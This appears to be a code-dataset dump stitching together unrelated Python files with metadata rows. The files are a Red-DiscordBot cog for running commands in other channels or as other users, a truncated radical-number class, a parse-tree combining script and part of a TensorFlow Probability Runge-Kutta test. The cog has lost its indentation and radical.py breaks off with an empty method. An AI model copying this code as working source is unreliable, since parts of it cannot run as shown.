# Thanks to TrustyJAID for the code (a bit modified to work here and to improve as needed) for the log messages sent! (https://github.com/TrustyJAID/Trusty-cogs/tree/master/extendedmodlog)
# Thanks to Kreusada for the code (with modifications to make it work and match the syntax of the rest) to add a log channel or remove it if no channel is specified! (https://github.com/Kreusada/Kreusada-Cogs/tree/master/captcha)
# Thanks to the developers of the cogs I added features to as it taught me how to make a cog! (Chessgame by WildStriker, Captcha by Kreusada, Speak by Epic guy and Rommer by Dav)
# Thanks to all the people who helped me with some commands in the #coding channel of the redbot support server!
_ = Translator("CmdChannel", __file__)
@cog_i18n(_)
class CmdChannel(commands.Cog):
"""A cog to send the result of a command to another channel!"""
def __init__(self, bot):
self.bot: Red = bot
self.config: Config = Config.get_conf(
self,
identifier=793502759720,
force_registration=True,
)
self.cmd_guild = {
"logschannel": None, # The channel for logs.
"enabled_cmdchannel": True, # Enable the possibility of commands.
"confirmation_cmdchannel": False, # Enable the confirmation.
"deletemessage_cmdchannel": False, # Enable the message delete.
"informationmessage_cmdchannel": False, # Enable the information message.
"enabled_cmduser": True, # Enable the possibility of commands.
"confirmation_cmduser": False, # Enable the confirmation.
"deletemessage_cmduser": False, # Enable the message delete.
"informationmessage_cmduser": False, # Enable the information message.
"enabled_cmduserchannel": True, # Enable the possibility of commands.
"confirmation_cmduserchannel": False, # Enable the confirmation.
"deletemessage_cmduserchannel": False, # Enable the message delete.
"informationmessage_cmduserchannel": False, # Enable the information message.
}
self.config.register_guild(**self.cmd_guild)
self.cogsutils = CogsUtils(cog=self)
self.cogsutils._setup()
@commands.guild_only()
@commands.mod()
@commands.command(aliases=["channelcmd"])
async def cmdchannel(self, ctx: commands.Context, guild: typing.Optional[discord.Guild]=None, channel: typing.Optional[typing.Union[discord.TextChannel, int]]=None, *, command: str = ""):
"""Act as if the command had been typed in the channel of your choice.
The prefix must be entered if it is a command. Otherwise, it will be a message only.
If you do not specify a channel, the current one will be used, unless the command you want to use is the name of an existing channel (help or test for example).
"""
if channel is not None:
if isinstance(channel, int):
if guild is not None:
channel = guild.get_channel(channel)
else:
if ctx.author.id in ctx.bot.owner_ids:
await ctx.send(_("Please specify a server if you want to use a command in another server.").format(**locals()))
return
else:
channel = None
if channel is None:
channel = ctx.channel
guild = channel.guild
if channel not in ctx.guild.channels and ctx.author.id not in ctx.bot.owner_ids:
await ctx.send(_("Only a bot owner can use a command from another server.").format(**locals()))
return
member = guild.get_member(ctx.author.id)
if member is None:
await ctx.send(_("To send commands to another server, you must be there.").format(**locals()))
return
if not command and not ctx.message.embeds and not ctx.message.attachments:
await ctx.send_help()
return
config = await self.config.guild(guild).all()
logschannel = config["logschannel"]
actual_state_enabled = config["enabled_cmdchannel"]
actual_state_confirmation = config["confirmation_cmdchannel"]
actual_state_deletemessage = config["deletemessage_cmdchannel"]
actual_state_information = config["informationmessage_cmdchannel"]
cmd_colour = await self.bot.get_embed_colour(guild.text_channels[0])
if actual_state_enabled:
permissions = channel.permissions_for(ctx.author)
if permissions.read_messages and permissions.send_messages:
if actual_state_information:
await channel.send(_("The command issued in this channel is:\n```{command}```").format(**locals()))
if logschannel:
can_run = await self.member_can_run(ctx)
embed = discord.Embed(
description=f"CmdChannel - Command used: {command}",
colour=cmd_colour,
)
embed.add_field(name=(_("Imitated user").format(**locals())), value=ctx.author.mention)
embed.add_field(name=(_("Channel").format(**locals())), value=channel.mention)
embed.add_field(name=(_("Can Run").format(**locals())), value=str(can_run))
author_title = _("{ctx.author} ({ctx.author.id}) - Used a Command").format(**locals())
embed.set_author(name=author_title, icon_url=ctx.author.display_avatar if self.cogsutils.is_dpy2 else ctx.author.avatar_url)
logschannel = ctx.bot.get_channel(logschannel)
await logschannel.send(embed=embed)
await self.cogsutils.invoke_command(author=ctx.author, channel=channel, command=command)
if actual_state_confirmation:
try:
await ctx.author.send(_("The `{command}` command has been launched in the {channel} channel. You can check if it worked.").format(**locals()))
except discord.Forbidden:
await ctx.send(_("The `{command}` command has been launched in the {channel} channel. You can check if it worked.").format(**locals()))
else:
try:
await ctx.author.send(_("You cannot run this command because you do not have the permissions to send messages in the {channel} channel.").format(**locals()))
except discord.Forbidden:
await ctx.send(_("You cannot run this command because you do not have the permissions to send messages in the {channel} channel.").format(**locals()))
else:
try:
await ctx.author.send(_("CommandChannel have been disabled by an administrator of this server.").format(**locals()))
except discord.Forbidden:
await ctx.send(_("CommandChannel have been disabled by an administrator of this server.").format(**locals()))
return
@commands.guild_only()
@commands.is_owner()
@commands.command(aliases=["usercmd"])
async def cmduser(self, ctx: commands.Context, user: typing.Optional[discord.Member]=None, *, command: str = ""):
"""Act as if the command had been typed by imitating the specified user.
The prefix must be entered if it is a command. Otherwise, it will be a message only.
If you do not specify a user, the author will be used.
"""
if user is None:
user = ctx.author
if not command and not ctx.message.embeds and not ctx.message.attachments:
await ctx.send_help()
return
config = await self.config.guild(ctx.guild).all()
logschannel = config["logschannel"]
actual_state_enabled = config["enabled_cmduser"]
actual_state_confirmation = config["confirmation_cmduser"]
actual_state_deletemessage = config["deletemessage_cmduser"]
actual_state_information = config["informationmessage_cmduser"]
cmd_colour = await self.bot.get_embed_colour(ctx.guild.text_channels[0])
if actual_state_enabled:
permissions = ctx.channel.permissions_for(ctx.author)
if permissions.read_messages and permissions.send_messages:
if actual_state_information:
await ctx.channel.send(_("The command issued in this channel is:\n```{command}```").format(**locals()))
if logschannel:
can_run = await self.member_can_run(ctx)
embed = discord.Embed(
description=_("CmdUser - Command used: {command}").format(**locals()),
colour=cmd_colour,
)
embed.add_field(name=(_("Imitated user").format(**locals())), value=user)
embed.add_field(name=(_("Channel").format(**locals())), value=ctx.channel.mention)
embed.add_field(name=(_("Can Run").format(**locals())), value=str(can_run))
author_title = _("{ctx.author} ({ctx.author.id}) - Used a Command").format(**locals())
embed.set_author(name=author_title, icon_url=ctx.author.display_avatar if self.cogsutils.is_dpy2 else ctx.author.avatar_url)
logschannel = ctx.bot.get_channel(logschannel)
await logschannel.send(embed=embed)
await self.cogsutils.invoke_command(author=user, channel=ctx.channel, command=command)
if actual_state_confirmation:
try:
await ctx.author.send(_("The `{command}` command has been launched in the {ctx.channel} channel by imitating the {user} user. You can check if it worked.").format(**locals()))
except discord.Forbidden:
await ctx.send(_("The `{command}` command has been launched in the {ctx.channel} channel by imitating the {user} user. You can check if it worked.").format(**locals()))
else:
try:
await ctx.author.send(_("You cannot run this command because you do not have the permissions to send messages in the {ctx.channel} channel.").format(**locals()))
except discord.Forbidden:
await ctx.send(_("You cannot run this command because you do not have the permissions to send messages in the {ctx.channel} channel.").format(**locals()))
else:
try:
await ctx.author.send(_("CommandUser have been disabled by an administrator of this server.").format(**locals()))
except discord.Forbidden:
await ctx.send(_("CommandUser have been disabled by an administrator of this server.").format(**locals()))
return
@commands.guild_only()
@commands.is_owner()
@commands.command(aliases=["userchannelcmd"])
async def cmduserchannel(self, ctx: commands.Context, user: typing.Optional[discord.Member]=None, channel: typing.Optional[discord.TextChannel]=None, *, command: str = ""):
"""Act as if the command had been typed in the channel of your choice by imitating the specified user.
The prefix must be entered if it is a command. Otherwise, it will be a message only.
If you do not specify a user, the author will be used.
"""
if channel is None:
channel = ctx.channel
if user is None:
user = ctx.author
if not command and not ctx.message.embeds and not ctx.message.attachments:
await ctx.send_help()
return
config = await self.config.guild(ctx.guild).all()
logschannel = config["logschannel"]
actual_state_enabled = config["enabled_cmduserchannel"]
actual_state_confirmation = config["confirmation_cmduserchannel"]
actual_state_deletemessage = config["deletemessage_cmduserchannel"]
actual_state_information = config["informationmessage_cmduserchannel"]
cmd_colour = await self.bot.get_embed_colour(ctx.guild.text_channels[0])
if actual_state_enabled:
permissions = channel.permissions_for(ctx.author)
if permissions.read_messages and permissions.send_messages:
if actual_state_information:
await channel.send(_("The command issued in this channel is:\n```{command}```").format(**locals()))
if logschannel:
can_run = await self.member_can_run(ctx)
embed = discord.Embed(
description=_("CmdUserChannel - Command used: {command}").format(**locals()),
colour=cmd_colour,
)
embed.add_field(name=(_("Imitated user").format(**locals())), value=user)
embed.add_field(name=(_("Channel").format(**locals())), value=channel.mention)
embed.add_field(name=(_("Can Run").format(**locals())), value=str(can_run))
author_title = _("{ctx.author} ({ctx.author.id}) - Used a Command").format(**locals())
embed.set_author(name=author_title, icon_url=ctx.author.display_avatar if self.cogsutils.is_dpy2 else ctx.author.avatar_url)
logschannel = ctx.bot.get_channel(logschannel)
await logschannel.send(embed=embed)
await self.cogsutils.invoke_command(author=user, channel=channel, command=command)
if actual_state_confirmation:
try:
await ctx.author.send(_("The `{command}` command has been launched in the {channel} channel by imitating the {user} user. You can check if it worked.").format(**locals()))
except discord.Forbidden:
await ctx.send(_("The `{command}` command has been launched in the {channel} channel by imitating the {user} user. You can check if it worked.").format(**locals()))
else:
try:
await ctx.author.send(_("You cannot run this command because you do not have the permissions to send messages in the {channel} channel.").format(**locals()))
except discord.Forbidden:
await ctx.send(_("You cannot run this command because you do not have the permissions to send messages in the {channel} channel.").format(**locals()))
else:
try:
await ctx.author.send(_("CommandUserChannel have been disabled by an administrator of this server.").format(**locals()))
except discord.Forbidden:
await ctx.send(_("CommandUserChannel have been disabled by an administrator of this server.").format(**locals()))
return
@commands.command()
async def testvar(self, ctx: commands.Context):
"""Test variables.
"""
embed: discord.Embed = discord.Embed()
embed.title = _("Testvar").format(**locals())
embed.description = _("Variables:").format(**locals())
embed.add_field(
name=_("Author:").format(**locals()),
value=f"{ctx.author}")
embed.add_field(
name=_("Channel:").format(**locals()),
value=f"{ctx.channel}")
await ctx.send(embed=embed)
@commands.guild_only()
@commands.guildowner_or_permissions(administrator=True)
@commands.group(name="cmdset", aliases=["setcmd"])
async def configuration(self, ctx: commands.Context):
"""Configure Command for your server."""
@configuration.command(aliases=["lchann", "lchannel", "logschan", "logchannel", "logsc"], usage="<text_channel_or_'none'>")
async def logschannel(self, ctx: commands.Context, *, channel: typing.Optional[discord.TextChannel]=None):
"""Set a channel where events are registered.
``channel``: Text channel.
You can also use "None" if you wish to remove the logging channel.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
if channel is None:
await self.config.guild(ctx.guild).logschannel.clear()
await ctx.send(_("Logging channel removed.").format(**locals()))
return
needperm = await self.check_permissions_in_channel(["embed_links", "read_messages", "read_message_history", "send_messages", "attach_files"], channel)
if needperm:
await ctx.send(_("The bot does not have at least one of the following permissions in this channel: `embed_links`, `read_messages`, `read_message_history`, `send_messages`, `attach_files`.")).format(**locals())
return
await self.config.guild(ctx.guild).logschannel.set(channel.id)
await ctx.send(_("Logging channel registered: {channel.mention}.").format(**locals()))
async def check_permissions_in_channel(self, permissions: typing.List[str], channel: discord.TextChannel):
"""Function to checks if the permissions are available in a guild.
This will return a list of the missing permissions.
"""
return [
permission
for permission in permissions
if not getattr(channel.permissions_for(channel.guild.me), permission)
]
@commands.guildowner_or_permissions(administrator=True)
@configuration.group(name="cmdchannel", aliases=["channelcmd"])
async def cmdchannelconfig(self, ctx: commands.Context):
"""Configure CmdChannel for your server."""
@cmdchannelconfig.command(name="enable", aliases=["activate"], usage="<true_or_false>")
async def activatecmdchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable CommandChannel.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_enabled = config["enabled_cmdchannel"]
if actual_state_enabled is state:
await ctx.send(_("CommandChannel is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).enabled_cmdchannel.set(state)
await ctx.send(_("CommandChannel state registered: {state}.").format(**locals()))
@cmdchannelconfig.command(name="confirmation", aliases=["confirm"], usage="<true_or_false>")
async def confirmationcmdchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable confirmation.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_confirmation = config["confirmation_cmdchannel"]
if actual_state_confirmation is state:
await ctx.send(_("Confirmation is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).confirmation_cmdchannel.set(state)
await ctx.send(f"Confirmation state registered: {state}.")
@cmdchannelconfig.command(name="delete", aliases=["deletemessage"], usage="<true_or_false>")
async def deletemessagecmdchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable message delete.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_delete = config["deletemessage_cmdchannel"]
if actual_state_delete is state:
await ctx.send(_("Message delete is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).deletemessage_cmdchannel.set(state)
await ctx.send(_("Message delete state registered: {state}.").format(**locals()))
@cmdchannelconfig.command(name="information", aliases=["info"], usage="<true_or_false>")
async def informationcmdchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable information message.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_information = config["informationmessage_cmdchannel"]
if actual_state_information is state:
await ctx.send(_("Information message is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).informationmessage_cmdchannel.set(state)
await ctx.send(_("Information message state registered: {state}.").format(**locals()))
@commands.guildowner_or_permissions(administrator=True)
@configuration.group(name="cmduser", aliases=["usercmd"])
async def cmduserconfig(self, ctx: commands.Context):
"""Configure CmdUser for your server."""
@cmduserconfig.command(name="enable", aliases=["activate"], usage="<true_or_false>")
async def activatecmduser(self, ctx: commands.Context, state: bool):
"""Enable or disable CommandUser.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_enabled = config["enabled_cmduser"]
if actual_state_enabled is state:
await ctx.send(_("CommandUser is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).enabled_cmduser.set(state)
await ctx.send(_("CommandUser state registered: {state}.").format(**locals()))
@cmduserconfig.command(name="confirmation", aliases=["confirm"], usage="<true_or_false>")
async def confirmationcmduser(self, ctx: commands.Context, state: bool):
"""Enable or disable confirmation.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_confirmation = config["confirmation_cmduser"]
if actual_state_confirmation is state:
await ctx.send(_("CommandUser confirmation is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).confirmation_cmduser.set(state)
await ctx.send(_("CommandUser confirmation state registered: {state}.").format(**locals()))
@cmduserconfig.command(name="delete", aliases=["deletemessage"], usage="<true_or_false>")
async def deletemessagecmduser(self, ctx: commands.Context, state: bool):
"""Enable or disable message delete.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_delete = config["deletemessage_cmduser"]
if actual_state_delete is state:
await ctx.send(_("CommandUser message delete is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).deletemessage_cmduser.set(state)
await ctx.send(_("CommandUser message delete state registered: {state}.").format(**locals()))
@cmduserconfig.command(name="information", aliases=["info"], usage="<true_or_false>")
async def informationcmduser(self, ctx: commands.Context, state: bool):
"""Enable or disable information message.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_information = config["informationmessage_cmduser"]
if actual_state_information is state:
await ctx.send(_("CommandUser information message is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).informationmessage_cmduser.set(state)
await ctx.send(_("CommandUser information message state registered: {state}.").format(**locals()))
@commands.guildowner_or_permissions(administrator=True)
@configuration.group(name="cmduserchannel", aliases=["userchannelcmd"])
async def cmduserchannelconfig(self, ctx: commands.Context):
"""Configure CmdUserChannel for your server."""
@cmduserchannelconfig.command(name="enable", aliases=["activate"], usage="<true_or_false>")
async def activatecmduserchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable CommandUserChannel.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_enabled = config["enabled_cmduserchannel"]
if actual_state_enabled is state:
await ctx.send(_("CommandUserChannel is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).enabled_cmduserchannel.set(state)
await ctx.send(_("CommandUserChannel state registered: {state}.").format(**locals()))
@cmduserchannelconfig.command(name="confirmation", aliases=["confirm"], usage="<true_or_false>")
async def confirmationcmduserchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable confirmation.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_confirmation = config["confirmation_cmduserchannel"]
if actual_state_confirmation is state:
await ctx.send(_("CommandUserChannel confirmation is already set on {state}."))
return
await self.config.guild(ctx.guild).confirmation_cmduserchannel.set(state)
await ctx.send(_("CommandUserChannel confirmation state registered: {state}.").format(**locals()))
@cmduserchannelconfig.command(name="delete", aliases=["deletemessage"], usage="<true_or_false>")
async def deletemessagecmduserchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable message delete.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_delete = config["deletemessage_cmduserchannel"]
if actual_state_delete is state:
await ctx.send(_("CommandUserChannel message delete is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).deletemessage_cmduserchannel.set(state)
await ctx.send(_("CommandUserChannel message delete state registered: {state}.").format(**locals()))
@cmduserchannelconfig.command(name="information", aliases=["info"], usage="<true_or_false>")
async def informationcmduserchannel(self, ctx: commands.Context, state: bool):
"""Enable or disable information message.
Use `True` (Or `yes`) to enable or `False` (or `no`) to disable.
"""
if not ctx.author.id == ctx.guild.owner.id:
await ctx.send(_("Only the owner of this server can access these commands!").format(**locals()))
return
config = await self.config.guild(ctx.guild).all()
actual_state_information = config["informationmessage_cmduserchannel"]
if actual_state_information is state:
await ctx.send(_("CommandUserChannel information message is already set on {state}.").format(**locals()))
return
await self.config.guild(ctx.guild).informationmessage_cmduserchannel.set(state)
await ctx.send(_("CommandUserChannel information message state registered: {state}.").format(**locals()))
async def member_can_run(self, ctx: commands.Context) -> bool:
"""Check if a user can run a command.
This will take the current context into account, such as the
server and text channel.
https://github.com/Cog-Creators/Red-DiscordBot/blob/V3/release/3.0.0/redbot/cogs/permissions/permissions.py
"""
command = ctx.message.content.replace(ctx.prefix, "")
com = ctx.bot.get_command(command)
if com is None:
return False
else:
try:
testcontext = await ctx.bot.get_context(ctx.message, cls=commands.Context)
to_check = [*reversed(com.parents)] + [com]
can = False
for cmd in to_check:
can = await cmd.can_run(testcontext)
if can is False:
break
except (commands.CheckFailure, commands.DisabledCommand):
can = False
return can | 53.681034 | 229 | 0.637964 |
c0f4e2a773890721ecd880b703ffa0e4cc031d70 | 337 | py | Python | radical/radical.py | ndarwin314/symbolicPy | ce2e48bf1557b5995db6c324ada9fbd4767df1e3 | [
"MIT"
] | null | null | null | radical/radical.py | ndarwin314/symbolicPy | ce2e48bf1557b5995db6c324ada9fbd4767df1e3 | [
"MIT"
] | null | null | null | radical/radical.py | ndarwin314/symbolicPy | ce2e48bf1557b5995db6c324ada9fbd4767df1e3 | [
"MIT"
] | null | null | null | import numbers
class Radical(numbers.Real):
__slots__ = ("radicand", "degree")
def __init__(self, radicand, degree): # radicand ** (1/degree)
self.radicand = radicand
self.degree = degree
def __float__(self):
return pow(self.radicand, 1 / self.degree)
def __eq__(self, other):
| 22.466667 | 68 | 0.608309 |
e345c02900c0c413f4de04fa3bc399c4c309f06e | 5,493 | py | Python | src/demo/ai/solarix/DeSR/desr-1.3.2/script/treeCombine.py | name212/GrammarEngine | 1912809d6a19977c9d2fff88279b76a6152b659d | [
"MIT"
] | 55 | 2015-04-11T17:39:27.000Z | 2022-01-07T17:52:22.000Z | src/demo/ai/solarix/DeSR/desr-1.3.2/script/treeCombine.py | name212/GrammarEngine | 1912809d6a19977c9d2fff88279b76a6152b659d | [
"MIT"
] | 17 | 2017-11-22T13:31:11.000Z | 2021-06-06T08:30:43.000Z | src/demo/ai/solarix/DeSR/desr-1.3.2/script/treeCombine.py | qwazer/GrammarEngine | 08e1eb7bdfd77f29a51a7063848d74b9171291c4 | [
"MIT"
] | 28 | 2015-05-21T08:27:31.000Z | 2022-02-24T21:42:36.000Z | #!/usr/bin/env python
#----------------------------------------------------------------------
# Copyright (c) 2008 Giuseppe Attardi (attardi@di.unipi.it).
# Copyright (c) 2008 Felice Dell'Orletta (dellorle@di.unipi.it).
#----------------------------------------------------------------------
# Combines three parse trees (maximum spanning tree).
import sys
import re
# use binary mode to avoid adding \r
if sys.platform == "win32":
import os, msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
debug = False #True
if len(sys.argv) < 7:
print 'usage:', sys.argv[0], ' file1 file2 file3 eval1 eval1 eval3'
print ' file1 file2 file3 are the output of three parsers'
print ' eval1 eval2 eval3 are their evaluations produced by eval07.pl'
print ' ORDER files by LAS.'
sys.exit()
class Sentence:
"represents a sentence"
def __init__(self, tokens):
self.tokens = tokens
self.roots = []
for n in tokens:
if n.head == 0:
self.roots.append(n)
if n.head != 0:
tokens[n.head-1].children.append(n)
def __repr__(self):
return '\n'.join([str(x) for x in self.tokens])
class Token:
"represent a single token in a sentence"
def __init__(self, id, word, lemma, cpos, pos, mfeats, head, dep, weight):
self.id = int(id)
self.word = word
self.lemma = lemma
self.cpos = cpos
self.pos = pos
self.mfeats = mfeats
self.head = int(head)
self.dep = dep
self.weight = weight
self.children = []
def __init__(self, items, weights):
self.id = int(items[0])
self.word = items[1]
self.lemma = items[2]
self.cpos = items[3]
self.pos = items[4]
self.mfeats = items[5]
self.head = int(items[6])
self.dep = items[7]
self.weight = weights.get(self.cpos, 0)
self.children = []
def __repr__(self):
return '\t'.join([str(self.id), self.word, self.lemma, self.cpos, self.pos, self.mfeats, str(self.head), self.dep, str(self.weight)])
class ArcInfo:
"arc stored in fringe"
def __init__(self, weight, tok):
self.weight = weight
self.tok = tok
def __repr__(self):
return str(self.weight)
weight1 = {}
weight2 = {}
weight3 = {}
rel = re.compile(r'(\S+).*\s(\d+)%', re.I)
def loadScores(eval1, eval2, eval3):
"create weight maps from eval07 files"
file1 = open(eval1)
file2 = open(eval2)
file3 = open(eval3)
# skip initial part of files
for n in range(0, 22):
line1 = file1.readline()
line2 = file2.readline()
line3 = file3.readline()
more1 = rel.search(line1)
more2 = rel.search(line2)
more3 = rel.search(line3)
while more1 or more2 or more3:
if more1:
weight1[more1.group(1)] = int(more1.group(2))
line1 = file1.readline()
more1 = rel.search(line1)
if more2:
weight2[more2.group(1)] = int(more2.group(2))
line2 = file2.readline()
more2 = rel.search(line2)
if more3:
weight3[more3.group(1)] = int(more3.group(2))
line3 = file3.readline()
more3 = rel.search(line3)
file1.close()
file2.close()
file3.close()
def removeBest(fringe):
"remove the arc in fringe with the highest weight and return it"
max = -1
# questo for puo' essere eliminato utilizzando una struttura dati
# ordinata sui pesi (per ora e' ok, ma non lo calcoliamo nel costo
# computazionale (diventera' log_n) )
for arc in fringe:
arcInfo = fringe[arc]
if max < arcInfo.weight:
max = arcInfo.weight
tok = arcInfo.tok
best = arc
del fringe[best]
return tok
def aggiungi(fringe, tok, tree):
tree[tok.id-1] = tok
# questo for puo' essere eliminato utilizzando un altro hashmap
# solo di chiavi (per ora e' ok, ma non lo calcoliamo nel
# costo compuatazionale.. diventera' costante)
for k in fringe.keys():
token = fringe[k].tok
if token.id == tok.id and token != tok:
del fringe[k]
def expand(fringe, tok, tree):
"add arcs starting from tok"
children = tokens1[tok.id-1].children + tokens2[tok.id-1].children + tokens3[tok.id-1].children
for child in children:
if not (child.id-1) in tree:
arc = (child.id, child.head, child.dep)
if arc in fringe:
fringe[arc].weight += child.weight
else:
fringe[arc] = ArcInfo(child.weight, child)
def combineTrees(roots):
tree = {} # the combined tree
# fringe of the tree being built, contains arcs <id, head, dep>
# with associated weight
fringe = {}
for root in roots:
arc = (root.id, root.head, root.dep)
if arc in fringe:
fringe[arc].weight += root.weight
else:
fringe[arc] = ArcInfo(root.weight, root)
while len(fringe) != 0:
if debug:
print fringe
tok = removeBest(fringe)
#tree[tok.id-1] = tok # add to tree
aggiungi(fringe, tok, tree)
expand(fringe, tok, tree)
return tree
def combineFiles(file1, file2, file3):
global tokens1, tokens2, tokens3
tokens1 = []
tokens2 = []
tokens3 = []
sysFile1 = open(file1)
sysFile2 = open(file2)
sysFile3 = open(file3)
while True:
line1 = sysFile1.readline()
line2 = sysFile2.readline()
line3 = sysFile3.readline()
if line1 == '':
break
if line1 == '\n':
sent1 = Sentence(tokens1)
sent2 = Sentence(tokens2)
sent3 = Sentence(tokens3)
roots = sent1.roots + sent2.roots + sent3.roots
sentence = combineTrees(roots)
for k in range(0, len(sentence)):
print sentence[k]
print
tokens1 = []
tokens2 = []
tokens3 = []
continue
tokens1.append(Token(line1.split(), weight1))
tokens2.append(Token(line2.split(), weight2))
tokens3.append(Token(line3.split(), weight3))
loadScores(sys.argv[4], sys.argv[5], sys.argv[6])
combineFiles(sys.argv[1], sys.argv[2], sys.argv[3])
| 26.795122 | 135 | 0.653923 |
f8f1a97e80a349acff0194aa5c73bf0eaef76d89 | 6,468 | py | Python | tensorflow_probability/python/math/ode/runge_kutta_util_test.py | brianwa84/probability | 6f8e78d859ac41170be5147c8c7bde54cc5aa83e | [
"Apache-2.0"
] | 2 | 2020-12-17T20:43:24.000Z | 2021-06-11T22:09:16.000Z | tensorflow_probability/python/math/ode/runge_kutta_util_test.py | brianwa84/probability | 6f8e78d859ac41170be5147c8c7bde54cc5aa83e | [
"Apache-2.0"
] | 2 | 2021-08-25T16:14:51.000Z | 2022-02-10T04:47:11.000Z | tensorflow_probability/python/math/ode/runge_kutta_util_test.py | brianwa84/probability | 6f8e78d859ac41170be5147c8c7bde54cc5aa83e | [
"Apache-2.0"
] | 1 | 2020-06-04T23:26:31.000Z | 2020-06-04T23:26:31.000Z | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Tests for Runge-Kutta solver utils."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.internal import test_util
from tensorflow_probability.python.math.ode import runge_kutta_util as rk_util
@test_util.test_all_tf_execution_regimes
@parameterized.named_parameters([
('float64', tf.float64),
('complex128', tf.complex128),
])
class RungeKuttaUtilTest(test_util.TestCase):
def test_polynomial_fit(self, dtype):
"""Asserts that interpolation of 4th order polynomial is exact."""
coefficients = [1 + 2j, 0.3 - 1j, 3.5 - 3.7j, 0.5 - 0.1j, 0.1 + 0.1j]
coefficients = [tf.cast(c, dtype) for c in coefficients]
def f(x):
components = []
for power, c in enumerate(reversed(coefficients)):
components.append(c * x**power)
return tf.add_n(components)
def f_prime(x):
components = []
for power, c in enumerate(reversed(coefficients[:-1])):
components.append(c * x**(power) * (power + 1))
return tf.add_n(components)
coeffs = rk_util._fourth_order_interpolation_coefficients(
f(0.0), f(10.0), f(5.0), f_prime(0.0), f_prime(10.0), 10.0)
times = np.linspace(0, 10, dtype=np.float32)
y_fit = tf.stack(
[rk_util.evaluate_interpolation(coeffs, 0.0, 10.0, t) for t in times])
y_expected = f(times)
self.assertAllClose(y_fit, y_expected)
def test_weighted_sum_tensor(self, dtype):
del dtype # not used in this test case.
weights = [0.5, -0.25, -0.25]
states = [tf.eye(2) for _ in range(3)]
weighted_tensor_sum = rk_util.weighted_sum(weights, states)
self.assertAllClose(weighted_tensor_sum, tf.zeros((2, 2)))
weights = [0.5, -0.25, -0.25, 1.0]
states = [tf.ones(2) for _ in range(4)]
weighted_tensor_sum = rk_util.weighted_sum(weights, states)
self.assertAllClose(weighted_tensor_sum, tf.ones(2))
weights = [0.5, -0.25, -0.25, 0.0]
states = [tf.eye(2) for _ in range(4)]
weighted_tensor_sum = rk_util.weighted_sum(weights, states)
self.assertAllClose(weighted_tensor_sum, tf.zeros((2, 2)))
def test_weighted_sum_nested_type(self, dtype):
del dtype # not used in this test case.
weights = [0.5, -0.25, -0.25]
